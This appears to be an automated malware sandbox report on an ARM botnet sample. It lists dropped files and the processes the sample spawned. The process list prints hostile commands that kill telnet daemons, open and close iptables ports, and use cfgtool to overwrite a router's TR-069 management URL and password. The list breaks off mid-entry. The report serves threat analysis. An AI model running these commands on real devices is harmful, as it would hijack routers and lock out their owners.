IOCReport

loading gif

Files

File Path
Type
Category
Malicious
MGuvcs6Ocz
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
 malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
 malicious
/etc/init.d/hostname.sh
ASCII text
dropped
 malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall.sh
ASCII text
dropped
 malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
 malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
 malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
 malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
 malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
 malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
 malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
 malicious
/etc/rc.local
ASCII text
dropped
 malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/usr/bin/gettext.sh
ASCII text
dropped
 malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
 malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
 malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
 clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
 clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
 clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/undock.sh
ASCII text
dropped
 clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
 clean
/tmp/.config
ASCII text
dropped
 clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
 clean
/usr/share/alsa/utils.sh
ASCII text
dropped
 clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
 clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
 clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
 clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
 clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
 clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
 clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
 clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
 clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
 clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
 clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
 clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
 clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
 clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
 clean
/usr/share/os-prober/common.sh
ASCII text
dropped
 clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
 clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
 clean
There are 212 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/MGuvcs6Ocz
/usr/bin/qemu-arm /tmp/MGuvcs6Ocz
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
 clean
/bin/sh
n/a
 clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 44343 -j ACCEPT
 clean
/sbin/iptables
n/a
 clean
/sbin/modprobe
/sbin/modprobe ip_tables
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 44343 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 7723 -j ACCEPT
 clean
/tmp/MGuvcs6Ocz
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 7723 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
